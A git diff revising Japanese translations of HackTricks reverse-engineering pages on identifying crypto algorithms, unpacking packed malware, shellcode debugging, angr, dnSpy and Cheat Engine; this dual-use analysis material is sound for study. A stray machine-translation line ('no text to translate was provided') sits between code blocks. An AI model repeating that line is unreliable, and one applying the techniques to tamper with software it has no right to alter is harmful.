+コードが**シフト右と左、XORおよびいくつかの算術演算**を使用している場合、それは**暗号化アルゴリズム**の実装である可能性が非常に高いです。ここでは、**各ステップを逆にする必要なく使用されているアルゴリズムを特定する方法**をいくつか示します。
 
 ### API関数
 
@@ -16,7 +16,7 @@
 
 ![](<../../images/image (375) (1) (1) (1) (1).png>)
 
-可能なアルゴリズムとその割り当てられた値の表をこちらで確認してください: [https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id](https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id)
+可能なアルゴリズムとその割り当てられた値の表はここで確認できます: [https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id](https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id)
 
 **RtlCompressBuffer/RtlDecompressBuffer**
 
@@ -24,7 +24,7 @@
 
 **CryptAcquireContext**
 
-[ドキュメント](https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptacquirecontexta)から: **CryptAcquireContext**関数は、特定の暗号サービスプロバイダー（CSP）内の特定のキーコンテナへのハンドルを取得するために使用されます。**この返されたハンドルは、選択されたCSPを使用するCryptoAPI**関数への呼び出しで使用されます。
+[ドキュメントから](https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptacquirecontexta): **CryptAcquireContext**関数は、特定の暗号サービスプロバイダー（CSP）内の特定のキーコンテナへのハンドルを取得するために使用されます。**この返されたハンドルは、選択されたCSPを使用するCryptoAPI**関数への呼び出しで使用されます。
 
 **CryptCreateHash**
 
@@ -33,7 +33,7 @@
 ![](<../../images/image (376).png>)
 
 \
-可能なアルゴリズムとその割り当てられた値の表をこちらで確認してください: [https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id](https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id)
+可能なアルゴリズムとその割り当てられた値の表はここで確認できます: [https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id](https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id)
 
 ### コード定数
 
@@ -87,7 +87,7 @@
 ### **特徴**
 
 - **置換ボックスとルックアップテーブルの使用**
-- **特定のルックアップテーブルの値**（定数）の使用によりAESを**区別することが可能**です。_注意してください、**定数**は**バイナリに保存**されることもあれば、_ _**動的に作成**_されることもあります。_
+- **特定のルックアップテーブルの値**（定数）の使用によりAESを**区別することが可能です**。_注意してください、**定数**は**バイナリに保存**されることもあれば、_ _**動的に作成**されることもあります。_
 - **暗号化キー**は**16で割り切れる**必要があります（通常32B）し、通常は16Bの**IV**が使用されます。
 
 ### SBox定数
@@ -99,11 +99,11 @@
 ### 特徴
 
 - マルウェアがこれを使用しているのを見つけるのは稀ですが、例（Ursnif）があります。
-- アルゴリズムがサーペントかどうかは、その長さ（非常に長い関数）に基づいて簡単に判断できます。
+- アルゴリズムがサーペントかどうかをその長さ（非常に長い関数）に基づいて簡単に判断できます。
 
 ### 特定
 
-次の画像では、定数**0x9E3779B9**が使用されていることに注意してください（この定数は**TEA**（Tiny Encryption Algorithm）などの他の暗号アルゴリズムでも使用されています）。\
+次の画像では、定数**0x9E3779B9**が使用されていることに注意してください（この定数は**TEA**（Tiny Encryption Algorithm）などの他の暗号アルゴリズムでも使用されます）。\
 また、**ループのサイズ**（**132**）と**逆アセンブル**命令および**コード**例における**XOR操作の数**にも注意してください：
 
 ![](<../../images/image (381).png>)
@@ -112,7 +112,7 @@
 
 ![](<../../images/image (382).png>)
 
-したがって、**マジックナンバー**と**初期XOR**を確認し、**非常に長い関数**を見て、**長い関数のいくつかの命令を実装**（左に7シフトし、左に22回回転させる）と**比較する**ことで、このアルゴリズムを特定することが可能です。
+したがって、**マジックナンバー**と**初期XOR**を確認し、**非常に長い関数**を見て、**長い関数のいくつかの命令を実装**（左に7シフトし、左に22回回転する）と**比較する**ことで、このアルゴリズムを特定することが可能です。
 
 ## RSA **(非対称暗号)**
 
@@ -133,7 +133,7 @@
 
 ### 特徴
 
-- 3つの関数: Init, Update, Final
+- 3つの関数：Init、Update、Final
 - 初期化関数が似ています。
 
 ### 特定
@@ -152,7 +152,7 @@
 
 ## CRC（ハッシュ）
 
-- より小さく、データの偶発的な変更を見つけるための機能として効率的です。
+- 小さく、データの偶発的な変更を見つけるために効率的です。
 - ルックアップテーブルを使用します（したがって、定数を特定できます）。
 
 ### 特定
diff --git a/src/reversing/cryptographic-algorithms/unpacking-binaries.md b/src/reversing/cryptographic-algorithms/unpacking-binaries.md
index 7307a153d..9e3991628 100644
--- a/src/reversing/cryptographic-algorithms/unpacking-binaries.md
+++ b/src/reversing/cryptographic-algorithms/unpacking-binaries.md
@@ -1,6 +1,6 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-# パックされたバイナリの識別
+# パックされたバイナリの特定
 
 - **文字列の欠如**: パックされたバイナリにはほとんど文字列がないことが一般的です。
 - **未使用の文字列**: また、マルウェアが商業用パッカーを使用している場合、相互参照のない多くの文字列が見つかることが一般的です。これらの文字列が存在しても、バイナリがパックされていないことを意味するわけではありません。
@@ -11,13 +11,14 @@
 
 # 基本的な推奨事項
 
-- **IDAでパックされたバイナリを下から上に**分析し始めます。アンパッカーはアンパックされたコードが終了すると終了するため、アンパッカーが最初にアンパックされたコードに実行を渡すことは考えにくいです。
-- **レジスタ**や**メモリ**の**領域**への**JMP**や**CALL**を検索します。また、**引数とアドレスをプッシュしてから`retn`を呼び出す関数**を検索します。なぜなら、その場合、関数の戻り値がスタックにプッシュされたアドレスを呼び出す可能性があるからです。
-- `VirtualAlloc`に**ブレークポイント**を設定します。これはプログラムがアンパックされたコードを書き込むためのメモリ内のスペースを割り当てます。「ユーザーコードまで実行」するか、F8を使用して**関数を実行した後にEAX内の値を取得**します。そして「**ダンプ内のそのアドレスを追跡**」します。アンパックされたコードが保存される領域であるかもしれないので、そこがどこか分かりません。
-- **`VirtualAlloc`**に**「40」**という値を引数として渡すことは、読み取り+書き込み+実行を意味します（ここに実行が必要なコードがコピーされる予定です）。
-- コードを**アンパックしている間**、**算術演算**や**`memcopy`**や**`Virtual`**`Alloc`のような関数への**いくつかの呼び出し**を見つけるのは普通です。もし算術演算のみを行っている関数にいる場合、またはおそらくいくつかの`memcopy`を行っている場合、**関数の終わりを見つける**（おそらくレジスタへのJMPまたは呼び出し）**か**、少なくとも**最後の関数への呼び出しを見つけて実行する**ことをお勧めします。なぜなら、そのコードは興味深くないからです。
-- コードをアンパックしている間、**メモリ領域が変更された**場合は注意してください。メモリ領域の変更は**アンパックコードの開始**を示す可能性があります。Process Hackerを使用してメモリ領域を簡単にダンプできます（プロセス --> プロパティ --> メモリ）。
-- コードをアンパックしようとしているとき、**アンパックされたコードで作業しているかどうかを知る良い方法**（そのため、単にダンプできます）は、**バイナリの文字列を確認すること**です。もしある時点でジャンプを行い（おそらくメモリ領域を変更して）、**はるかに多くの文字列が追加された**ことに気づいた場合、**アンパックされたコードで作業している**ことがわかります。しかし、パッカーにすでに多くの文字列が含まれている場合は、「http」という単語を含む文字列の数を確認し、この数が増加するかどうかを確認できます。
-- メモリの領域から実行可能ファイルをダンプするとき、[PE-bear](https://github.com/hasherezade/pe-bear-releases/releases)を使用していくつかのヘッダーを修正できます。
+- **IDAでパックされたバイナリを** **下から上に** **分析し始めます**。アンパッカーはアンパックされたコードが終了すると終了するため、アンパッカーが最初にアンパックされたコードに実行を渡すことは考えにくいです。
+- **レジスタ**や**メモリ**の**領域**への**JMP**や**CALL**を探します。また、**引数とアドレスをプッシュしてから`retn`を呼び出す関数**を探します。なぜなら、その場合の関数の戻りは、呼び出す前にスタックにプッシュされたアドレスを呼び出す可能性があるからです。
+- `VirtualAlloc`に**ブレークポイント**を設定します。これは、プログラムがアンパックされたコードを書き込むためのメモリ内のスペースを割り当てます。「ユーザーコードまで実行」するか、F8を使用して**関数を実行した後にEAX内の値に到達します**。そして「**ダンプ内のそのアドレスを追跡します**」。アンパックされたコードが保存される領域であるかもしれないので、わかりません。
+- **`VirtualAlloc`**に**「40」**という値を引数として渡すことは、読み取り+書き込み+実行を意味します（実行が必要なコードがここにコピーされる予定です）。
+- コードを**アンパックしている間**、**算術演算**や**`memcopy`**や**`Virtual`**`Alloc`のような関数への**いくつかの呼び出し**を見つけるのは普通です。もし、明らかに算術演算のみを行い、場合によっては`memcopy`を行う関数にいる場合、**関数の終わりを見つける**（おそらくレジスタへのJMPまたは呼び出し）**か**、少なくとも**最後の関数への呼び出しを見つけて実行する**ことをお勧めします。なぜなら、そのコードは興味深くないからです。
+- コードをアンパックしている間、**メモリ領域を変更する**たびに**注意してください**。メモリ領域の変更は、**アンパックコードの開始を示す可能性があります**。Process Hackerを使用してメモリ領域を簡単にダンプできます（プロセス --> プロパティ --> メモリ）。
+- コードをアンパックしようとしているとき、**アンパックされたコードで作業しているかどうかを知る良い方法**（そのため、単にダンプできます）は、**バイナリの文字列を確認することです**。もし、ある時点でジャンプを行い（おそらくメモリ領域を変更して）、**はるかに多くの文字列が追加されたことに気づいた場合**、**アンパックされたコードで作業していることがわかります**。\
+しかし、パッカーにすでに多くの文字列が含まれている場合は、「http」という単語を含む文字列の数を確認し、この数が増加するかどうかを確認できます。
+- メモリの領域から実行可能ファイルをダンプすると、[PE-bear](https://github.com/hasherezade/pe-bear-releases/releases)を使用していくつかのヘッダーを修正できます。
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/reversing/reversing-tools-basic-methods/README.md b/src/reversing/reversing-tools-basic-methods/README.md
index 0fbe8103c..65cfe82f4 100644
--- a/src/reversing/reversing-tools-basic-methods/README.md
+++ b/src/reversing/reversing-tools-basic-methods/README.md
@@ -12,9 +12,9 @@
 
 オンライン:
 
-- [https://webassembly.github.io/wabt/demo/wasm2wat/index.html](https://webassembly.github.io/wabt/demo/wasm2wat/index.html)を使用して、**wasm**（バイナリ）から**wat**（クリアテキスト）に**デコンパイル**します。
-- [https://webassembly.github.io/wabt/demo/wat2wasm/](https://webassembly.github.io/wabt/demo/wat2wasm/)を使用して、**wat**から**wasm**に**コンパイル**します。
-- [https://wwwg.github.io/web-wasmdec/](https://wwwg.github.io/web-wasmdec/)を使用してデコンパイルすることもできます。
+- [https://webassembly.github.io/wabt/demo/wasm2wat/index.html](https://webassembly.github.io/wabt/demo/wasm2wat/index.html)を使用して**デコンパイル**します（wasm（バイナリ）からwat（クリアテキスト）へ）
+- [https://webassembly.github.io/wabt/demo/wat2wasm/](https://webassembly.github.io/wabt/demo/wat2wasm/)を使用して**コンパイル**します（watからwasmへ）
+- [https://wwwg.github.io/web-wasmdec/](https://wwwg.github.io/web-wasmdec/)を使用してデコンパイルすることもできます
 
 ソフトウェア:
 
@@ -31,23 +31,23 @@ dotPeekは、**ライブラリ**（.dll）、**Windowsメタデータファイ
 
 ### [.NET Reflector](https://www.red-gate.com/products/reflector/)
 
-包括的なアドインモデルと、ツールを正確なニーズに合わせて拡張するAPIを備えた.NET Reflectorは、時間を節約し、開発を簡素化します。このツールが提供する逆コンパイルサービスの豊富さを見てみましょう：
+包括的なアドインモデルと、ツールを正確なニーズに合わせて拡張するAPIを備えた.NET Reflectorは、時間を節約し、開発を簡素化します。このツールが提供する逆コンパイルサービスの数々を見てみましょう：
 
-- ライブラリやコンポーネントを通じてデータがどのように流れるかの洞察を提供します。
-- .NET言語やフレームワークの実装と使用に関する洞察を提供します。
-- 使用されているAPIや技術からより多くの機能を引き出すために、文書化されていない機能や公開されていない機能を見つけます。
-- 依存関係や異なるアセンブリを見つけます。
-- コード、サードパーティコンポーネント、およびライブラリ内のエラーの正確な場所を追跡します。
-- あなたが扱うすべての.NETコードのソースをデバッグします。
+- ライブラリやコンポーネントを通じてデータがどのように流れるかの洞察を提供
+- .NET言語やフレームワークの実装と使用に関する洞察を提供
+- APIや使用されている技術からより多くの機能を引き出すために、文書化されていない機能や公開されていない機能を見つける
+- 依存関係や異なるアセンブリを見つける
+- コード、サードパーティコンポーネント、ライブラリ内のエラーの正確な場所を追跡
+- あなたが扱うすべての.NETコードのソースをデバッグ
 
 ### [ILSpy](https://github.com/icsharpcode/ILSpy) & [dnSpy](https://github.com/dnSpy/dnSpy/releases)
 
-[Visual Studio Code用ILSpyプラグイン](https://github.com/icsharpcode/ilspy-vscode): どのOSでも使用できます（VSCodeから直接インストールできます。gitをダウンロードする必要はありません。**拡張機能**をクリックし、**ILSpy**を検索します）。\
-**デコンパイル**、**修正**、および再**コンパイル**する必要がある場合は、[**dnSpy**](https://github.com/dnSpy/dnSpy/releases)またはそのアクティブにメンテナンスされているフォークである[**dnSpyEx**](https://github.com/dnSpyEx/dnSpy/releases)を使用できます。（**右クリック -> メソッドを修正**して関数内の何かを変更します）。
+[Visual Studio Code用ILSpyプラグイン](https://github.com/icsharpcode/ilspy-vscode): どのOSでも使用できます（VSCodeから直接インストールできます。gitをダウンロードする必要はありません。**拡張機能**をクリックし、**ILSpyを検索**します）。\
+**デコンパイル**、**修正**、再度**コンパイル**する必要がある場合は、[**dnSpy**](https://github.com/dnSpy/dnSpy/releases)またはそのアクティブにメンテナンスされているフォークである[**dnSpyEx**](https://github.com/dnSpyEx/dnSpy/releases)を使用できます。（**右クリック -> メソッドを修正**して関数内の何かを変更します）。
 
 ### DNSpyロギング
 
-**DNSpyがファイルに情報をログする**ために、このスニペットを使用できます：
+**DNSpyがファイルに情報をログする**ために、このスニペットを使用できます:
 ```cs
 using System.IO;
 path = "C:\\inetpub\\temp\\MyTest2.txt";
@@ -63,28 +63,28 @@ DNSpy を使用してコードをデバッグするには、次の手順を実
 ```aspnet
 [assembly: Debuggable(DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints)]
 ```
-翻訳する内容が提供されていません。翻訳が必要なテキストを提供してください。
+翻訳するテキストが提供されていません。翻訳が必要な内容を教えてください。
 ```
 [assembly: Debuggable(DebuggableAttribute.DebuggingModes.Default |
 DebuggableAttribute.DebuggingModes.DisableOptimizations |
 DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints |
 DebuggableAttribute.DebuggingModes.EnableEditAndContinue)]
 ```
-そして、**compile**をクリックします：
+そして、**コンパイル**をクリックします：
 
 ![](<../../images/image (314) (1).png>)
 
-次に、_**File >> Save module...**_を介して新しいファイルを保存します：
+次に、_**ファイル >> モジュールを保存...**_を介して新しいファイルを保存します：
 
 ![](<../../images/image (602).png>)
 
-これは必要です。なぜなら、これを行わないと、**runtime**中にいくつかの**optimisations**がコードに適用され、デバッグ中に**break-pointが決してヒットしない**か、いくつかの**variablesが存在しない**可能性があるからです。
+これは必要です。なぜなら、これを行わないと、**ランタイム**中にいくつかの**最適化**がコードに適用され、デバッグ中に**ブレークポイントが決してヒットしない**か、いくつかの**変数が存在しない**可能性があるからです。
 
-次に、.NETアプリケーションが**IIS**によって**run**されている場合は、次のコマンドで**restart**できます：
+次に、.NETアプリケーションが**IIS**によって**実行**されている場合は、次のコマンドで**再起動**できます：
 ```
 iisreset /noforce
 ```
-すべての開いているファイルを閉じて、**Debug Tab**内で**Attach to Process...**を選択します：
+すべての開いているファイルを閉じた後、**Debug Tab**内で**Attach to Process...**を選択します：
 
 ![](<../../images/image (318).png>)
 
@@ -121,7 +121,7 @@ iisreset /noforce
 
 ![](<../../images/image (868).png>)
 
-- 実行の**parameters**を設定し、**DLLのパス**と呼び出したい関数を指定します：
+- 実行の**パラメータ**を設定し、**DLLのパス**と呼び出したい関数を指定します：
 
 ![](<../../images/image (704).png>)
 
@@ -144,13 +144,13 @@ iisreset /noforce
 
 ## GUI Apps / Videogames
 
-[**Cheat Engine**](https://www.cheatengine.org/downloads.php)は、実行中のゲームのメモリ内に重要な値が保存されている場所を見つけて変更するのに役立つプログラムです。詳細は以下を参照してください：
+[**Cheat Engine**](https://www.cheatengine.org/downloads.php)は、実行中のゲームのメモリ内に重要な値が保存されている場所を見つけて変更するための便利なプログラムです。詳細は以下を参照してください：
 
 {{#ref}}
 cheat-engine.md
 {{#endref}}
 
-[**PiNCE**](https://github.com/korcankaraokcu/PINCE)は、GNU Project Debugger (GDB)のフロントエンド/リバースエンジニアリングツールで、ゲームに特化しています。ただし、リバースエンジニアリングに関連する任意の作業にも使用できます。
+[**PiNCE**](https://github.com/korcankaraokcu/PINCE)は、GNU Project Debugger (GDB)のフロントエンド/リバースエンジニアリングツールで、ゲームに特化しています。ただし、リバースエンジニアリング関連の作業にも使用できます。
 
 [**Decompiler Explorer**](https://dogbolt.org/)は、いくつかのデコンパイラへのウェブフロントエンドです。このウェブサービスを使用すると、小さな実行可能ファイルに対する異なるデコンパイラの出力を比較できます。
 
@@ -163,7 +163,7 @@ cheat-engine.md
 ### Debugging a shellcode with blobrunner
 
 [**Blobrunner**](https://github.com/OALabs/BlobRunner)は、**shellcode**をメモリのスペース内に**割り当て**、**shellcode**が割り当てられた**メモリアドレス**を**示し**、実行を**停止**します。\
-その後、プロセスに**デバッガ**（Idaまたはx64dbg）をアタッチし、**指定されたメモリアドレスにブレークポイントを設定**し、実行を**再開**します。これにより、shellcodeのデバッグが行えます。
+その後、プロセスに**デバッガ**（Idaまたはx64dbg）をアタッチし、**指定されたメモリアドレスにブレークポイントを設定**し、実行を**再開**します。この方法で、shellcodeをデバッグします。
 
 リリースのGitHubページには、コンパイルされたリリースを含むzipファイルがあります：[https://github.com/OALabs/BlobRunner/releases/tag/v0.0.5](https://github.com/OALabs/BlobRunner/releases/tag/v0.0.5)\
 以下のリンクにBlobrunnerのわずかに修正されたバージョンがあります。コンパイルするには、**Visual Studio CodeでC/C++プロジェクトを作成し、コードをコピー＆ペーストしてビルド**します。
@@ -174,7 +174,7 @@ blobrunner.md
 
 ### Debugging a shellcode with jmp2it
 
-[**jmp2it** ](https://github.com/adamkramer/jmp2it/releases/tag/v1.4)は、blobrunnerに非常に似ています。**shellcode**をメモリのスペース内に**割り当て**、**永続ループ**を開始します。その後、プロセスに**デバッガをアタッチ**し、**再生を開始して2-5秒待ち、停止を押す**と、**永続ループ**内に入ります。永続ループの次の命令にジャンプすると、それはshellcodeへの呼び出しになります。最終的に、shellcodeを実行している自分を見つけることができます。
+[**jmp2it** ](https://github.com/adamkramer/jmp2it/releases/tag/v1.4)は、blobrunnerに非常に似ています。**shellcode**をメモリのスペース内に**割り当て**、**永遠のループ**を開始します。その後、プロセスに**デバッガをアタッチ**し、**再生を開始して2-5秒待ち、停止を押す**と、**永遠のループ**内に入ります。永遠のループの次の命令にジャンプすると、それはshellcodeへの呼び出しになります。最終的に、shellcodeを実行している自分を見つけることができます。
 
 ![](<../../images/image (509).png>)
 
@@ -253,7 +253,7 @@ Delphiバイナリをリバースする必要がある場合は、IDAプラグ
 
 **ATL+f7**を押して（IDAにPythonプラグインをインポート）Pythonプラグインを選択します。
 
-このプラグインは、バイナリを実行し、デバッグの開始時に関数名を動的に解決します。デバッグを開始した後、再度スタートボタン（緑のボタンまたはf9）を押すと、実際のコードの最初にブレークポイントがヒットします。
+このプラグインは、バイナリを実行し、デバッグの開始時に関数名を動的に解決します。デバッグを開始した後、再度スタートボタン（緑のボタンまたはf9）を押すと、実際のコードの最初でブレークポイントがヒットします。
 
 また、グラフィックアプリケーションでボタンを押すと、デバッガーはそのボタンによって実行された関数で停止するため、非常に興味深いです。
 
@@ -273,20 +273,20 @@ Golangバイナリをリバースする必要がある場合は、IDAプラグ
 ../../generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md
 {{#endref}}
 
-## GBA - Game Body Advance
+## GBA - ゲームボディアドバンス
 
 GBAゲームの**バイナリ**を取得した場合、さまざまなツールを使用して**エミュレート**および**デバッグ**できます:
 
 - [**no$gba**](https://problemkaputt.de/gba.htm) (_デバッグ版をダウンロード_) - インターフェースを持つデバッガーを含む
-- [**mgba** ](https://mgba.io) - CLIデバッガーを含む
+- [**mgba** ](https://mgba.io)- CLIデバッガーを含む
 - [**gba-ghidra-loader**](https://github.com/pudii/gba-ghidra-loader) - Ghidraプラグイン
 - [**GhidraGBA**](https://github.com/SiD3W4y/GhidraGBA) - Ghidraプラグイン
 
-[**no$gba**](https://problemkaputt.de/gba.htm)の_**Options --> Emulation Setup --> Controls**_\*\* \*\*では、Game Boy Advanceの**ボタン**を押す方法を確認できます。
+[**no$gba**](https://problemkaputt.de/gba.htm)の_**オプション --> エミュレーション設定 --> コントロール**_\*\* \*\*では、ゲームボーイアドバンスの**ボタン**を押す方法を確認できます。
 
 ![](<../../images/image (581).png>)
 
-押すと、各**キーには識別するための値**があります:
+押されると、各**キーには識別するための値**があります:
 ```
 A = 1
 B = 2
@@ -372,7 +372,7 @@ DAT_030000d8 = DAT_030000d8 + 0x3a;
 - 次に、**値8**（**START**ボタン）と比較されています：このチャレンジでは、コードがフラグを取得するのに有効かどうかを確認します。
 - この場合、変数**`DAT_030000d8`**は0xf3と比較され、値が同じであればいくつかのコードが実行されます。
 - その他のケースでは、いくつかのcont（`DAT_030000d4`）がチェックされます。これは、コードに入った直後に1を加算するためcontです。\
-**8未満**の場合、**`DAT_030000d8`**に値を**加算する**ことが行われます（基本的には、contが8未満の間、押されたキーの値をこの変数に加算しています）。
+**8未満の場合、**\*\*`DAT_030000d8` \*\*に値を**加算する**ことが行われます（基本的に、contが8未満の間、押されたキーの値をこの変数に加算しています）。
 
 したがって、このチャレンジでは、ボタンの値を知っている必要があり、**結果の合計が0xf3になるように、長さが8未満の組み合わせを押す必要があります。**
 
diff --git a/src/reversing/reversing-tools-basic-methods/angr/README.md b/src/reversing/reversing-tools-basic-methods/angr/README.md
index 5620f0841..44afc6a00 100644
--- a/src/reversing/reversing-tools-basic-methods/angr/README.md
+++ b/src/reversing/reversing-tools-basic-methods/angr/README.md
@@ -121,7 +121,7 @@ simgr.active[0].regs.rip #Get RIP from the last state
 
 - `entry_state` と `full_init_state` に `args` を通じて引数のリストを渡し、`env` を通じて環境変数の辞書を渡すことができます。これらの構造内の値は文字列またはビットベクタであり、シミュレーションされた実行の引数と環境として状態にシリアライズされます。デフォルトの `args` は空のリストなので、分析しているプログラムが少なくとも `argv[0]` を見つけることを期待している場合は、常にそれを提供する必要があります！
 - `argc` をシンボリックにしたい場合は、`entry_state` と `full_init_state` コンストラクタにシンボリックビットベクタを `argc` として渡すことができます。ただし、注意が必要です：これを行う場合、`argc` の値が `args` に渡した引数の数より大きくならないように、結果の状態に制約を追加する必要があります。
-- コールステートを使用するには、`.call_state(addr, arg1, arg2, ...)` で呼び出す必要があります。ここで `addr` は呼び出したい関数のアドレスで、`argN` はその関数への N 番目の引数であり、Python の整数、文字列、配列、またはビットベクタのいずれかです。メモリを割り当ててオブジェクトへのポインタを実際に渡したい場合は、`PointerWrapper` でラップする必要があります。つまり、`angr.PointerWrapper("point to me!")` のようにします。この API の結果は少し予測不可能ですが、改善に取り組んでいます。
+- コールステートを使用するには、`.call_state(addr, arg1, arg2, ...)` で呼び出す必要があります。ここで `addr` は呼び出したい関数のアドレスで、`argN` はその関数への N 番目の引数であり、Python の整数、文字列、配列、またはビットベクタのいずれかです。メモリを割り当ててオブジェクトへのポインタを実際に渡したい場合は、`angr.PointerWrapper("point to me!")` のように PointerWrapper でラップする必要があります。この API の結果は少し予測不可能ですが、改善に取り組んでいます。
 
 ## ビットベクタ
 ```python
@@ -166,7 +166,7 @@ solver.eval_exact(expression, n) #n solutions to the given expression, throwing
 solver.min(expression) #minimum possible solution to the given expression.
 solver.max(expression) #maximum possible solution to the given expression.
 ```
-## フック
+## フッキング
 ```python
 >>> stub_func = angr.SIM_PROCEDURES['stubs']['ReturnUnconstrained'] # this is a CLASS
 >>> proj.hook(0x10000, stub_func())  # hook with an instance of the class
diff --git a/src/reversing/reversing-tools-basic-methods/angr/angr-examples.md b/src/reversing/reversing-tools-basic-methods/angr/angr-examples.md
index 076abbf36..584ca1409 100644
--- a/src/reversing/reversing-tools-basic-methods/angr/angr-examples.md
+++ b/src/reversing/reversing-tools-basic-methods/angr/angr-examples.md
@@ -201,7 +201,7 @@ raise Exception('Could not find the solution')
 if __name__ == '__main__':
 main(sys.argv)
 ```
-このシナリオでは、入力は `scanf("%u %u")` で取得され、値 `"1 1"` が与えられたため、スタックの値 **`0x00000001`** は **ユーザー入力** から来ています。これらの値は `$ebp - 8` から始まることがわかります。したがって、コードでは **`$esp` に 8 バイトを引いています（その時 `$ebp` と `$esp` は同じ値を持っていました）** そして BVS をプッシュしました。
+このシナリオでは、入力は `scanf("%u %u")` で取得され、値 `"1 1"` が与えられたため、スタックの値 **`0x00000001`** は **ユーザー入力** から来ています。これらの値が `$ebp - 8` から始まることがわかります。したがって、コードでは **`$esp` から 8 バイトを引いています（その時 `$ebp` と `$esp` は同じ値を持っていました）** そして BVS をプッシュしました。
 
 ![](<../../../images/image (136).png>)
 
@@ -393,22 +393,22 @@ main(sys.argv)
 >   # hello_txt_contents = claripy.BVV('Hello world, my name is John.', 30*8)
 >   #
 >   # その後、ジョンを
->   # シンボリック変数に置き換えたいと思うかもしれません。次のように呼び出します：
+>   # シンボリック変数に置き換えたいと思うかもしれません。私たちは呼び出します：
 >   #
 >   # name_bitvector = claripy.BVS('symbolic_name', 4*8)
 >   #
 >   # その後、プログラムがfopen('hello.txt', 'r')を呼び出し、
 >   # fread(buffer, sizeof(char), 30, hello_txt_file)を実行すると、バッファには
->   # ファイルからの文字列が含まれますが、名前が保存される4バイトは
->   # シンボリックになります。
+>   # ファイルからの文字列が含まれますが、名前が
+>   # 保存される4バイトのシンボリックな部分を除いています。
 >   # (!)
 > ```
 
 ### 制約の適用
 
 > [!NOTE]
-> 時には、16文字の2つの単語を**文字ごとに**比較するような単純な人間の操作が（ループ）、**angr**にとっては非常にコストがかかります。なぜなら、それは**指数的に**分岐を生成する必要があるからです。1つのifごとに1つの分岐を生成します：`2^16`\
-> したがって、**angrに以前のポイントに戻るように依頼する方が簡単**であり（実際の難しい部分はすでに完了しています）、**これらの制約を手動で設定する**ことができます。
+> 時には、16文字の2つの単語を**文字ごとに**比較するような単純な人間の操作が、**angr**にとっては非常にコストがかかります。なぜなら、それは**指数的に**分岐を生成する必要があるからです。1つのifごとに1つの分岐を生成します：`2^16`\
+> したがって、**angrに以前のポイントに戻るように依頼する方が簡単**であり（実際の難しい部分はすでに完了しています）、**それらの制約を手動で設定する**方が良いです。
 ```python
 # After perform some complex poperations to the input the program checks
 # char by char the password against another password saved, like in the snippet:
@@ -480,15 +480,15 @@ if __name__ == '__main__':
 main(sys.argv)
 ```
 > [!CAUTION]
-> 一部のシナリオでは、**veritesting**を有効にすることができ、類似の状態を統合して無駄な分岐を削減し、解決策を見つけることができます: `simulation = project.factory.simgr(initial_state, veritesting=True)`
+> 一部のシナリオでは、**veritesting**を有効にすることができ、類似の状態を統合して無駄なブランチを削減し、解決策を見つけることができます: `simulation = project.factory.simgr(initial_state, veritesting=True)`
 
 > [!NOTE]
-> これらのシナリオでできる別のことは、**angrがより簡単に理解できるものを関数にフックする**ことです。
+> これらのシナリオでできる別のことは、**angrがより理解しやすいものを与えるために関数をフックする**ことです。
 
 ### シミュレーションマネージャー
 
-一部のシミュレーションマネージャーは他のものよりも便利です。前の例では、多くの有用な分岐が作成されるという問題がありました。ここでは、**veritesting**技術がそれらを統合し、解決策を見つけます。\
-このシミュレーションマネージャーは次のようにも有効にできます: `simulation = project.factory.simgr(initial_state, veritesting=True)`
+一部のシミュレーションマネージャーは他のものよりも便利です。前の例では、多くの有用なブランチが作成されるという問題がありました。ここでは、**veritesting**技術がそれらを統合し、解決策を見つけます。\
+このシミュレーションマネージャーは次のようにしても有効にできます: `simulation = project.factory.simgr(initial_state, veritesting=True)`
 ```python
 import angr
 import claripy
diff --git a/src/reversing/reversing-tools-basic-methods/blobrunner.md b/src/reversing/reversing-tools-basic-methods/blobrunner.md
index 75ecd8ba5..a8616ed8f 100644
--- a/src/reversing/reversing-tools-basic-methods/blobrunner.md
+++ b/src/reversing/reversing-tools-basic-methods/blobrunner.md
@@ -1,6 +1,7 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-[オリジナルコード](https://github.com/OALabs/BlobRunner)からの唯一の修正された行は10行目です。コンパイルするには、**Visual Studio CodeでC/C++プロジェクトを作成し、コードをコピーして貼り付けてビルドします**。
+[オリジナルコード](https://github.com/OALabs/BlobRunner)からの唯一の修正された行は10行目です。
+コンパイルするには、**Visual Studio CodeでC/C++プロジェクトを作成し、コードをコピーして貼り付けてビルドします**。
 ```c
 #include <stdio.h>
 #include <windows.h>
diff --git a/src/reversing/reversing-tools-basic-methods/cheat-engine.md b/src/reversing/reversing-tools-basic-methods/cheat-engine.md
index e384f5910..a67fcfc4e 100644
--- a/src/reversing/reversing-tools-basic-methods/cheat-engine.md
+++ b/src/reversing/reversing-tools-basic-methods/cheat-engine.md
@@ -34,7 +34,7 @@ _**Edit --> Settings --> Hotkeys**_ では、**ゲームを停止する**など
 
 ![](<../../images/image (563).png>)
 
-最後に、メモリ内で変更を行うために**チェックを入れる**：
+最後に、メモリ内で変更を行うために**チェックを入れる**ことができます：
 
 ![](<../../images/image (385).png>)
 
@@ -61,7 +61,7 @@ Cheat Engineは、**100から新しい値に変わった**値を検索します
 
 値が**わからない**が、**どのように変更するか**（変更の値も含む）を知っている場合は、数値を探すことができます。
 
-まず、**不明な初期値**のタイプのスキャンを実行します：
+まず、**不明な初期値**のタイプでスキャンを実行します：
 
 ![](<../../images/image (890).png>)
 
@@ -81,16 +81,16 @@ Cheat Engineは、**100から新しい値に変わった**値を検索します
 
 ### ランダムメモリアドレス - コードの発見
 
-これまで、値を保存しているアドレスを見つける方法を学びましたが、**ゲームの異なる実行でそのアドレスがメモリの異なる場所にある可能性が高い**です。では、そのアドレスを常に見つける方法を見つけましょう。
